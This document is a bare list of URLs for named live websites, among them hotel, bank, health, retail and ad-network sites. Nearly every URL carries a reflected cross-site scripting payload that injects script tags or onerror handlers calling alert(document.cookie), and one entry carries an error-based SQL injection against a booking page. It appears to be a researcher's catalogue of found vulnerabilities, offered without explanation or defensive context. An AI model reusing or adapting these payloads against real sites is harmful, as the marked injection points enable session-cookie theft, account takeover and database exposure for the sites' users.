.	http://redirectingat.com/api/?callback=skimlinksApplyHandlers4f8b9%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6deb514662f&data={%22pubcode%22:%223912X635905%22,%22domains%22:[%22kara.allthingsd.com%22,%22biggovernment.com%22,%22googlemobile.blogspot.com%22,%22deadline.com%22,%22engadget.com%22,%22newyorker.com%22,%22mediadecoder.blogs.nytimes.com%22,%22krugman.blogs.nytimes.com%22,%22artsbeat.blogs.nytimes.com%22,%22ubergizmo.com%22,%22thinkprogress.org%22,%22telegraph.co.uk%22,%22ib.adnxs.com%22,%22twitter.com%22,%22twittorati.com%22,%22blogcritics.org%22,%22technoratimedia.com%22,%22indyposted.com%22,%22mixx.com%22,%22wesay.com%22,%22dailyblogtips.com%22,%22environmentalgraffiti.com%22,%22blastmagazine.com%22,%22justin.tv%22,%22stylecrave.com%22,%22triond.com%22,%22shrinktheweb.com%22,%22creativecommons.org%22]}
.	http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09ae0dbaead=1
.	http://ad.media6degrees.com/adserv/cs?adType=iframe\|is_preview=0\|cId=4814\|ec=1\|spId=19013\|advId=651\|tpCId=153250\|exId=9\|price=0.200000\|vurlId=424\|srcUrlEnc=http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1\|notifyServer=asd132.sd.pl.pvt\|notifyPort=8080\|bid=0.20000000298023224\|tId=6210453202168737\|pubId=51\|invId=117\|secId=56\|tpSecId=233753\|foo=bar\|cb=1297260612\|ctrack=http://ib.adnxs.com/click/AQAAoJmZyT-amZlhj8LFPwAAAKCZmfE_mpmZYY_CxT8AAACgmZnJP8giKVhwODcdBWHfHSmrEEJEoFJNAAAAABmRAwA2AQAAfAAAABkAAACiVgIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEoQMAAgUCAAIAAAAAMiEewAAAAAA./cnd=%257B%255C%2522m6ClientId%255C%2522:835342505348660275,%255C%2522transactionId%255C%2522:6210453202168737,%255C%2522marketerId%255C%2522:651,%255C%2522campaignId%255C%2522:3231,%255C%2522spendId%255C%2522:19013,%255C%2522spendWeight%255C%2522:200,%255C%2522creativeId%255C%2522:4814,%255C%2522spendCreativeId%255C%2522:158392,%255C%2522adProfileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=467de%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0330d190362
.	http://d.skimresources.com/api/index.php?callback=skimwordsDataCallback897d0%3Cscript%3Ealert(document.cookie)%3C/script%3Effdf231be2f&data={%22page%22:%22http://technorati.com/%22}
.	http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5038686.44;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BwV8Flq5STZrkA53QlQfow_WxCoaXpoMCroD45Rv2p8fcQwAQARgBIJPFkxU4AFDprPy_B2DJhqOH1KOAELIBDndpa2l0cmF2ZWwub3JnugEKMTYweDYwMF9hc8gBCdoBUmh0dHA6Ly93aWtpdHJhdmVsLm9yZy9lbi9DaGFtb25peD9hMWMyYSUyMi1hbGVydChkb2N1bWVudC5jb29raWUpLSUyMjYzNzU0ZjljZjk3PTHgAQSYAp4KuAIYwAIByALml4sZqAMB9QMAAABE&num=1&sig=AGiWqtxZSDsP6c1iL5uh0sKAYz0_9ElXsQ&client=ca-pub-7695515998152344&adurl=6a609%22-alert(document.cookie)-%2291998b59f4d
.	http://www.chamonix.com/press,104,en.html?3e931%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E253c645a100=1
.	http://www.chamonix.net/english2d88d%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E15e84f5d817/webcam/chamcen.htm
.	http://www.marque-nf.com/?6a8a9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E13a974e03a4=1
.	http://www.ohm-chamonix.com/?5ca55%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E72dcd742f79=1
.	http://chamonix.for-system.com/index_uk.aspx?Rf=ZTQJWQ2QQQQQQWRJBR3ZNUWGTS&Globales/RZ=3221eee2b%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E3320bc6a2dc&NumEtape=1
.	http://www.aiglons.com/fr/offre.php?cat=-15954d%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Eac91e647a91&sscat=1


.	http://www.compagniedumontblanc.fr/index_my_cmb.php?langue=ENf0477%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E750b2d53efb
.	http://www.hameaualbert.fr/misc/drupal.js1ca13%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E0bfdceb7ad4?E
.	http://www.visitflorida.com/traffic.php3b5a1'-alert(document.cookie)-'51eec3dd73d
.	http://www.voyagespourlaplanete.com/category/destinations/france/rhones-alpesb6cb9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae0906a9acf/haute-savoie/
.	http://www.pointe-isabelle.com/specials.php?lang=frbf1ed%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea896a8d8d0d
.	http://www.hermitage-paccard.com/?id=forfaits5bcd4%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ec8806912d1c
.	https://www.hotel-dispo.com/netlink/002/index.php?ID=29677d2a0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E970b41057ae&LG=FR
.	http://www.linotype.com/?7cd02%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea9984de1f47=1
.	http://www.watchmouse.com/en/?9dda5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6abf1d1d559=1
.	http://www.watchmouse.com/en/assets1c1dc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef828aa78b0b/css/screen.css?20101008
.	http://www.watchmouse.com/en/assets/css2abab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efd7f8590f5f/screen.css?20101008
.	http://www.watchmouse.com/en/assets/css/screen.cssff752%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6eccb65ad2?20101008
.	http://www.watchmouse.com/assets645c0%22%3E%3Cscript%3Ealert(1)%3C/script%3E40b63ed072a/img/favicon.ico
.	http://www.watchmouse.com/assets/imgc01ba%22%3E%3Cscript%3Ealert(1)%3C/script%3E918860c39ed/favicon.ico
.	http://www.watchmouse.com/assets/img/favicon.ico9735e%22%3E%3Cscript%3Ealert(1)%3C/script%3E00477431364
.	http://www.chamonix-vacances.com/tourisme-vallorcine540f6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E82302643bc6/sports-hiver-mont-blanc.html
.	http://www.cofrac.fr/?e8d7a%22-alert(document.cookie)-%2239726de3d2=1
.	http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?cid=us_0810_2011Search_(ContentPTdf022%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec0d5ed8092a
.	http://www.onthesnow.com/widget/custom_v2cb9a2%22%3E%3Cscript%3Ealert(1)%3C/script%3E5517cf19275?resorts=314,129,462
.	http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1


.	https://activresa-secure2.icor.fr/distributeur/virtual_session.asp?centrale=COURCHEVEL553c9%3Cscript%3Ealert(document.cookie)%3C/script%3Ead03ac6cbad&distributeur=V0002&stop=1
.	http://bg.snow-forecast.com/login?'27b0d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E28e1c47004a
.	http://parkcitytrips.com/booking_results.php?cloneID=41&rooms=1&nights=1&group_id=(select+1+and+row(1,1)%3E(select+count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),(SELECT%20now()),CHAR(95),CHAR(33),CHAR(64)),0x3a,floor(rand()2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
.	http://www.theholidayplace.co.uk/holiday_itinerary.asp?a=19900908_16475966983c73%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efd2687caa08&s=4084&utm_campaign=wordtravels.com&utm_source=adnet-media.net&utm_medium=cpc
.	http://www.surf-forecast.com/?9721d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecc239a12bc7=1
.	http://www.skiamis.com/catered-search.htm?search_type=quick_search21c08%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E298c883a806&SEARCH_id_currency=1&SEARCH_id_accom_type=1&SEARCH_id_group_size=Any&SEARCH_id_resort=Any&SEARCH_id_calendar_date=Any&id_submit=Search
.	http://www.speedshape.com/portfolio/wp-content/themes/speedshape-v3//thumbs.php?w=28&h=28&zc=1&src=http://www.speedshape.com/portfolio/wp-content/uploads/albums/chevy-silverado-2010/thumbs/thumbs_01-ChevySilverado-2010-SSI/aac22%3Cscript%3Ealert(document.cookie)%3C/script%3E3b1c4914093.jpg
.	http://volumelicensing.adobe.com/store?Action=DisplayHomePage&Locale=en_US&SiteID=adbevlus&eee3d--%3E%3Cscript%3Ealert(document.cookie)%3C=&promoid=FCRWO&script%3E30b0bc90189=1
.	http://volumelicensing.adobe.com/store/adbevlus/DisplayHomePage?promoid=FCRWO&eee3d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E30b0bc90189=1
.	http://store1.adobe.com/cfusion/store/services/stateless/jsonshoppingservice.cfc?callback=getDataCartApplicationsDesignPremiumb7b9c%3Cscript%3Ealert(document.cookie)%3C/script%3Efd87cc85d7f&method=getCategoryPricesByCountry&countryCode=US&categoryPath=/Applications/DesignPremium&uc=1
.	https://www.adobe.com/cfusion/membership/index.cfm?nl=1&loc=en_us&nf=1772b5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed3ef7d7598a
.	http://pixel.yola.com/LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script
.	http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E80478cdc8ac/6
.	https://login.openx.org/sso/login?service=http://adserver.openx.org/e5ca3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb9deb20ab73
.	http://us.levi.com/home/index.jsp?41973--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E611476de3bd=1
.	https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/&7f449%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E015c86c2350=1
.	https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/b7ead%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee2d94503ef8
.	https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/&nsextt=%22%3E%3Cscript%3Ealert(9)%3C/script%3E
.	http://iconfactory.com/favicon.ico76031%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Eb9a88e5c578
.	https://www.networksolutions.com/manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1


.	http://www1.hilton.com/en_US/hi/hotel/BOSFDHF-Hilton-Boston-Financial-District-Massachusetts8b619%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fb045a4243/index.do;jsessionid=0ABC42E492304CBBBCE5486E110ECEB6.etc32?brand_id=HI&brand_directory=/en/hi/&xch=826093977,Q3LJIA5WFPFVGCSGBI1MVCQ
.	http://www.hilton.com/en/hi/hotels/search/newresults.jhtml;jsessionid=Q3LJIA5WFPFVGCSGBI1MVCQ?statusMsg=status_success.jhtml&searchType=city&null=3&eventType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E&it=Find,city&_requestid=279855
.	https://secure.hilton.com/en/hi/res/choose_dates.jhtml;jsessionid=Q3LJIA5WFPFVGCSGBI1MVCQ?_requestid=285735&86abc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E125a40cedac=1
.	http://realestate.boston.com/includes/iframes/Central_Ad.aspx?location=Bostonf1d29';alert(document.cookie)//969191c726c&state=MA
.	http://calendar.boston.com/json?jsonsp=Zvents_load_ZventsWidget1d09a7%3Cscript%3Ealert(document.cookie)%3C/script%3E179eab94f48&limit=2&p=40&search=true&when=Today&sid=0
.	http://btn.weather.ca/weatherbuttons/template5.php?placeCode=USMA0046&category0=Cities&containerWidth=150&btnNo=&backgroundColor=blue&multipleCity=0&citySearch=0&celsiusF=F57b9a%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E338fbadd480
.	http://www.homeinsight.com/Widget/default.asp?JExnY2lBWzwuIDplY2ZyQmA3XSkrZDIyXDUrXi8wYicvWSovKltbYDMlYV00K2EvWmAuLzBkJEhmT2VtZFpjZDorH05mR25tZWlpWWM8LiBMb1RhcWJeZmA1KCVQa0hucmFtZ11mOCkdTT5MT2dxYWBlYTcrHkp0X0JeX2JdcDZDX28YS2dmbRlVY11pIG8aR2daYGkaRl9wY2NtHD1qZltocWNobHEeVWJgbmM1LTQtIEFjZ19mbTkwMCgdS2JbXVFtbXBcYTdPZ2cfTWxoYnNbY2scUWBaamhxX2wkQWRnXmpuT3FnZDo7YGNsbB5QZV5iXWslUV9mbmpZcl5FXjgt&a4aff%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E8ce6c4ac049=1
.	http://widget.relocationality.com/searchwidget.php?agent=6345ad44%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E8780582e90e
.	http://cache-www.pronto.com/combine.phpd6bdb'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9cb9ce2aee9?type=javascript&hash=19&files=
.	http://loadus.exelator.com/load/?j=w&p=102&c=20210&g=001&kw=&ctg=1b51f%3C/ScRiPt%20%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ec4a36802f95&subctg=All
.	http://oasn04.247realmedia.com/2/LiveNation140c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6b55715eea5/ArtistAffinity/1832727109@x02?&prop3=LN_US:%20Home&prop16=LN_US:%20Home
.	http://snas.nbcuni.com/snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback60b4e%3Cscript%3Ealert(document.cookie)%3C/script%3E93142b60814
.	http://www.babypronto.com/?e65b5'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2d9936def6=1
.	http://my.nbc.com/app/socnet/accounts/register?mod=inline&siteName=nbc.com&refresh=true&redirectUrl=/accounts/link-your-profile&cssSkin=/app/socnet/css/fan-it-register.cssa29d9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2679af6670&hasStepTwo=false
.	http://html.aggregateknowledge.com/iframe?pid=32ca11c%3Cx%20style%3dx:expression(alert(1))%3Ebe32e7e9c3b&itemid=60458&senduuid=0&che=1297439075
.	http://www.u-tokyo.ac.jp/index_e.html?bd1cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4ef1fb46055=1
.	http://www.japan-guide.com/e/e2164.html?ab1d4%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a8465b9d46=1
.	http://widget.quantcast.com/wwp.greenwichmeantime.com36bcb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef55edf5835a/1
.	http://www.quantcast.com/learning-center/case-studies/study/auto3/?504f9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7707cd15c5e=1
.	http://wiki.answers.com/favicon.ico155eb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E94353820e1f


.	https://hubpages.com/signin/?s=high&url=/my/hubs/statsd5c59%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1de617bf248&explain=view%20your%20account%20settings.
.	http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22;alert(document.cookie)//5e820bfb5e
.	http://www.webmd.com/click?9f374"-alert(document.cookie)-"dd709cbc542=1
.	https://data.webmd.com/sdclive/sdcform.aspx?formid=l2uRegistration&566a4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee8792a84efa=1
.	http://exchanges.webmd.com/68316'-alert(document.cookie)-'5976a95f57f
.	http://forums.webmd.com/366cd4'-alert(document.cookie)-'0ac885bacdb/heart-disease-exchange/forum/NaN
.	http://www.emedicinehealth.com/script/main/hp.asp?78330%22-alert(document.cookie)-%2230a0e17e228=1
.	https://apply.chase.com/Auto/landingpage.aspx?offercode=f9b80%22style%3d%22x:expression(alert(1))%22d20292961db
.	http://www.chasemilitary.com/?7ca8c%22;alert(document.cookie)//4fee81aef6=1
.	http://bossip.com/?34e65%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E39a50604bc8=1
.	http://eventful.com/?45518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecc616a5fa67=1
.	http://splashpage.mtv.com/favicon.ico3ad54%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddbab9eb078
.	https://taxes.hrblock.com/hrblock/login/ForgotAccountInfo.hrbx?46f3a%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34df3b750ec=1
.	http://delb.opt.fimserve.com/fimbid/?cachebuster=1297527968699QYf&cb=window[%22tHiHk%22]28e62%3Cscript%3Ealert(document.cookie)%3C/script%3E01727d17839&sz=728x90&api=2&enc=1.1&est=b2bad27c9be54ebae765562787c6e1c9&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=-279234638&pcat=2&ck=1&fl=1&d=http://www.tmz.com/signup/
.	http://www.dailymotion.com/us?36e95%22-alert(document.cookie)-%223d06c4e1df7=1
.	http://www.dailymotion.com/us?36e95%22-alert(String.fromCharCode(72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72,32,67,87,69,45,55,57,32,88,83,83,32,68,79,82,75))-%223d06c4e1df7=1
.	http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917
.	http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
.	https://www.ups.com/one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%00'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
.	http://www.webbyawards.com/webbys/current_honorees.php?media_id=96f9e24%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E346d75171f8&category_id=61&season=13


.	http://www.dianomioffers.co.uk/smartads.epl?id=752198f9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddb3314bdd4
.	http://www.wikia.com/index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95be19a1de3&outputType=html
.	http://uk.reuters.com/assets/commentsChild?articleId=UKTRE71C1YB20110213fac44%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb818c7a361b&headline=''The+King's+Speech''+royal+winner+at+BAFTA+awards&channel=lifestyleMolt&edition=UK&view=base
.	http://oscar.wapolabs.com/RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578%3Cscript%3Ealert(String.fromCharCode(72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72,32,67,87,69,45,55,57,32,88,83,83,32,68,79,82,75,32,72,84,84,80,32,72,69,65,68,69,82,32,82,69,70,69,82,82,69,82))%3C/script%3Eead23a8fea2&format=json&url=http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display:none;&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=[CS]v1\|26AC438B850103D6-4000010D4000193E[CE]&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=[CS]v1\|26AC438B850103D6-4000010D4000193E[CE]&da.userAgent=Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+en-US)+AppleWebKit/534.13+(KHTML,+like+Gecko)+Chrome/9.0.597.98+Safari/534.13&da.userLanguage=en-US
.	http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
.	http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E045c9ac9fe9?ver=2.50
.	http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
.	http://dev.inskinmedia.com/trackports/rep/base/track.php?callback=jsonp129764733685915067%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31
.	http://forums.webmd.com/favicon.icobbaec'-alert(document.cookie)-'6ed61bc743e
.	http://cache1.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6
.	http://cache.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6
.	http://www.hidglobal.com/onlineOrderStatusRegistration.php?a9f34'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E43e4407fe64=1
.	http://www.securitynewsdaily.com/tools347ac'-alert(document.cookie)-'9f9a2e36974/
.	https://www-secure.symantec.com/connect/symantec_symaccount88e60'-alert(document.cookie)-'72d4beaeb8b?profileURL=https://symaccount-profile.symantec.com/SSO/index.jsp%3FssoID%3D1297710255984zLG9Ht01OE8Lpk2m7u68K6G69r7hE3181J0hD
.	http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico
.	http://michellemalkin.com/?81050%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E870b0f9b5a6=1
.	http://www.wnd.com/?pageId=43b3c67--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebfaacc0cca3&authorId=108&tId=8
.	http://www.itar-tass.com/eng/level2.html?GroupID=146&155f5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8f5b16e7b11=1
.	http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844?1de37'-alert(document.cookie)-'c190883ce16=1
.	http://www.thedailybeast.com/favicon.ico914b4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E400d90bee91


.	http://www.autocheck.com/?WT.mc_id=3499&siteID=34993a90c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E71b1ae04cc8
.	http://www.davidcorn.com/?f30aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E20a47154da3=1
.	http://www.thedailybeast.com/author/lloyd-grove/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
.	http://www.davidcorn.com/302b7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef7a89825d06
.	http://www.observer.com/author/rex-reed?4cffd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea708ae6face=1
.	http://www.stubhub.com/search/doSearch?searchStr=gipsy+kings&pageNumber=1&resultsPerPage=50&searchMode=event4343e%22;alert(document.cookie)//876e42bb3c8&start=0&rows=50&geo_exp=1&channel=
.	http://www.iso.org/iso/catalogue_detail.htm?c540a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecaf6dcdb360=1
.	http://schoonermaggieb.net/?bd52a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef777ff6092=1
.	https://sso.shld.net/shccas/shcLogin?sourceSiteId=null&service=f9a97%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee950194e815&gateway=true
.	http://www.stylemepretty.com/%7Chttp:/stylehive.com%7Chttp:/stylelist.com%7Chttp:/www.outblush.com/%7Chttp:/www.dooce.com/%7Chttp:/www.mightygoods.com/%7Chttp:/www.coolmompicks.com%7Conemanga.com%7Cpsychcentral.com%7Cwebmail.aol.com%7Chttp:ef655%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea44390d74f9/www.weblogsinc.com%7Chttp:/www.webmd.com/$%7Cwonderwall.msn.com%7Cmsn.com/wonderwall%7Cv14.msn.com/%7Cpreview.msn.com/%7Cwww.msn.com/preview.aspx%7Cmtv.com/videos/%7Cmtv.com/
.	http://new.evite.com/neo-services/analytics?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
.	http://v1.aberdeen.com/includes/asp/sponsored_registration.asp?ci=/launch/report/benchmark/6575-RA-content-aware-data-loss.asp&spid=30411935&camp=767d4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee91b1583aea
.	http://www.itbusinessedge.com/cm/community/news/sec/blog/microsoft-warns-of-windows-mhtml-xss-vulnerability/?cs=45331&60a70%22%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E2feb06588c5=1
.	https://buy.stubhub.com/checkout/checkout?logisticsMethod=2dbe9c';alert(document.cookie)//38fa58b682e&price=100.0&quantity_selected=2&ticket_id=281933854
.	http://www.wreg.com/tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false
.	http://wreg.vidcms.trb.com/alfresco/service/edgefa03a%3Cscript%3Ealert(document.cookie)%3C/script%3E54eb2fdb930/content/299fda98-b8af-49c4-987a-09d58e40d6e6
.	http://www.msg.com/js/msgcom51690%3Cscript%3Ealert(document.cookie)%3C/script%3Ed1a6cd6133f/omniture.js
.	http://alerts.4info.com/alert/listeners/getSportsListing.jsp;jsessionid=499F81F18F1B95FB02CAA5B3CF18DBA0?get=statsLeagues&callback=_4i.alerts[0].popLeagues58028%3Cscript%3Ealert(document.cookie)%3C/script%3E31acf6ed69b&output=json&seed=586772&rand=0.854787022806704
.	http://www.comcastoffers.com/?cid=524633e161--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2ae386e0a01&affid=422668326::b::internet%20service::dial%20up%20isp
.	http://virtacore.com/?66f9b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebbeb208fd95=1


.	http://www.thelist.com/?6fd89--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3e9f72d52de=1
.	http://member.internet.com/4ca4a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3bbcce52da1?v=df32f76fa6fa8754bd6541fbadfecfe211e5e258bcf020cb52e7a9e01ff3686a0edfe7667c06596631975dce2bb7dde8d8d152e9f519c68a2e56c43d18985ca6
.	http://isp.thelist.com/?4d0ed--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7894299f6b8=1
.	http://www.wi-fihotspotlist.com/?4100a--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1dd4930cfbd=1
.	http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
.	http://www.thecounter.com/?6955f--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee525c47aab4=1
.	http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
.	http://www.phpbuilder.com/?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1
.	http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
.	http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1
.	http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1
.	http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?60daf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16c9b78682c=1
